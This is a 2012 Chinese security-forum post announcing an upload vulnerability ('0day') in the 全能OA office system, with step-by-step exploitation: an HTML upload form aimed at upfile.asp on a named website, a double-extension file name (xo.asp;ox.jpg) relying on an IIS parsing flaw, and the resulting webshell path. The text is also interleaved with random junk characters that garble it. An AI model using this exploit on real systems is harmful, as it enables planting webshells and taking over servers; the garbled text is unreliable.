中国网络渗透测试联盟

标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞 [打印本页]

作者: admin    时间: 2012-11-21 13:45
标题: 全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞9 Z" Q( S8 U8 O" s4 V- t9 _

  N( N/ q, B$ `8 S/ {$ W# F, o系统介绍:/ T- i* u1 i, K5 e) ]
, T9 X+ F. g+ a/ f- p
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
1 t* w* }! B; L* g% c3 I0 P0 g- E; h
1 O* k& F0 z1 g. Q主要功能:
* H% J9 s$ b: z# X9 p公司通告 1 X: Z6 `- U& U2 C
工作计划
4 X; O' _& \" \3 a. k8 ^通讯助理 " J$ [* ?0 }, n! r% M
客户资源
$ @! `* \# I5 T8 z2 c" o我的公文 - l6 o/ [. _6 l; \$ j- f
公文传阅
7 v8 x2 b+ f+ E5 Q公共资源
! ~& ~2 [9 y3 N  _资源预约
* W- @) Z5 Q9 C: @2 ?. ~4 G今日考勤 , ~/ Q3 m" b. n. ~0 v1 i
个人计划 & }; ]/ u7 x7 |# N9 k9 Q7 ^- C
个人通讯录 3 \( P8 f: @4 G; I
个人基本档案
/ B4 f+ e1 k- Q8 t5 C  j3 W; ?: S未读邮件 * L* ?) }& ^9 K1 A$ V) O
发邮件
9 {. N! i2 c4 [: B! x$ x: h收件夹
6 O5 S( g9 A2 w; M. j寄件夹
  F) }' `/ \' {# \/ K4 t网络硬盘 # w% ?3 v4 n9 d8 }
网络会议 1 j& @) @) l5 D2 D) ~
网络调查
" X- k$ v) v# _交流论坛
" V- V; Q8 P" {1 h& p
7 M* w( v2 }8 b) \; Y; S) z有兴趣测试的朋友可以下源码看看
4 ?$ m  c* k3 X1 [( k( U' o1 n8 A' Y% Q! @
源码下载:8 D# c$ Y7 v  e& E$ [8 E4 k; H
1 I) K5 m: a1 X8 F2 Z$ }
http://www.mycodes.net/30/4750.htm
* J& q3 H; [6 i& {
5 c* o5 }$ n, Q" f) I漏洞介绍:( @7 d8 C, p5 Q/ y7 b* _

5 V, ^# w' D9 W9 J2 Z由upfile.asp上传文件漏洞引起
8 Q  J8 G! K' n1 A7 M7 V
7 p, H+ \2 l7 e" l" F/ ]4 b测试方法:
( q2 D  u3 E$ g- N% {
9 F$ I9 H8 \9 m  I" a, K8 h. M使用名小子上传http://www.itlynn.com/upfile.asp即可
! _, P! @( y9 y, \
- ]: l1 N6 `1 V' E7 \; {6 I  S/ T9 v如果upfile.asp文件被删除不存在。
, I" l$ L' T2 l: U3 A: d' v- M  T  P3 a
  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
* A$ _! Y5 l4 m2 z" @  e  n& ?% B1 z- o5 {: r2 W# k, w
如果存在那么将如下代码保存为upfile.html。/ q: z6 H4 l# T- a( M. s
8 a3 k) ?6 k5 ?* w( _
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
# u7 Z5 U7 p5 U  ~6 u& N, o% W0 d: {6 @" V) }9 g6 g& ~8 T- L

- `# s7 D3 ]( @5 }# k0 t* F
( v' \' [! _" d; M+ \01 <table border='0' align="center" cellpadding="5"> 9 s1 O) v' j& \, C3 f- r

+ F, I3 X( [( p- |& l2 @02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> - i  T' F! }. h7 |3 f
% v2 L# A1 ?: S4 J$ h4 V3 @
03 <tr> 0 S7 u9 i+ r! K

6 j7 R9 x9 v; M7 I$ K04             <td>报错:</td> 4 q! b. |  f5 l- V  G" s

' v$ T2 c" Y7 P! V6 L& @05             <td><input type='radio' name='errnumber' value='0'> 8 e8 h+ Z! p& q. ~8 e7 v

5 N! @" K8 v. ]& `  S3 S- f9 W06               自动更名 ( r6 c3 {0 @+ s5 ?

% P. o$ N5 o9 H3 J! {07               <input type='radio' name='errnumber' value='1' checked>   Z& u& }) {; E1 y( O0 ~- K5 H" O

/ l; W8 ?2 T* U1 m08               报错方式
6 f2 {3 L4 [0 p3 n; ]+ _
' `' ]% ~+ {$ ~. b9 _) g09               <input type='radio' name='errnumber' value='2'> * W( B6 K, @- E" J  m) r' [% O

+ ~1 ~  D+ g  Y- o  B10               直接覆盖</td> * ~# z7 ]0 m! r/ ~# E

* X( V" X' D, R1 C3 z4 v' h11           </tr> 5 E. z/ v& J% j

9 R9 ]: f% x8 q( N12           <tr>
% z+ w. G1 |/ m  t
, ~" `9 n% H) }2 \8 b7 N2 {13             <td>主题:</td>
6 B( H; a4 U) D/ J3 y
1 O2 D4 d) ^# @14             <td><input type='text' name='filename' size='30'></td> # m' ~1 t- i% v0 [  [$ c! x% g
; ?, h5 u" g  ~/ R
15           </tr>
3 X. k9 T0 `/ p2 J4 Z* U0 p! G  Z; i: V0 `" \$ a8 w6 u+ v
16           <tr> + Y: Q; z- O$ `# U

) O7 H. S, k$ H- h; ]0 B17             <td>文件:</td> 2 w" p0 ^0 c0 q2 P2 {) L7 h
+ |5 x8 v1 c3 ]! B, @$ R7 r% R2 ?
18             <td><input type="file"name="fruit"size="30"></td>
! x$ p5 m* G0 @' m3 C7 Y8 w/ [% g, P2 Z+ g( k0 r6 ~+ s' d# A6 @
19           </tr>
" ^' M: ]- a+ N
9 p' T: d  x" \! m  v20           <tr> , _5 C! p# {3 ~. q# ~% l
1 `0 S' S3 e0 W2 t4 G* ^5 ]; ]; P
21             <td valign='top'>简介:</td>
) u; N+ m; y* c) H4 g0 t$ k- y
% L. p* i# ^( Z# j$ P7 Z) G. h22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> 6 _4 g) W" S3 x
$ P& n4 [' Y& b( m) Z( q
23           </tr>
4 F: c/ l8 C1 M) y  X* _; K
4 F/ y. i% M& M24   
- f* b! s/ e) `
3 M% h, H7 D% q5 \6 g) U3 ^0 @9 ~25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
3 w3 q2 ]5 {  H$ A8 {5 D- ^4 x) U3 q2 [1 q4 q6 |& B4 n
26           </tr>
, f& T2 o3 J3 a8 {/ b9 X
2 h; Y* a* Y) s  f  H- c8 R27         </form>
0 R" N' o- {( B- O' c  Y
" k/ A  O% d* J2 R  p( [然后打开上传一个文件名为xo.asp;ox.jpg的文件。8 w* L) I& v+ n

' `- H$ }7 D2 `, ` 8 p- @, u6 n  [/ w

8 e% W, Q. x/ x9 e( B上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg1 e3 U4 c- `3 q0 M$ r9 h

% @7 l6 c2 {2 G4 U6 N此漏洞需要配合解析漏洞利用。5 T& S$ i  N8 r0 a1 P
7 D, n- K$ |! v/ c2 R





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2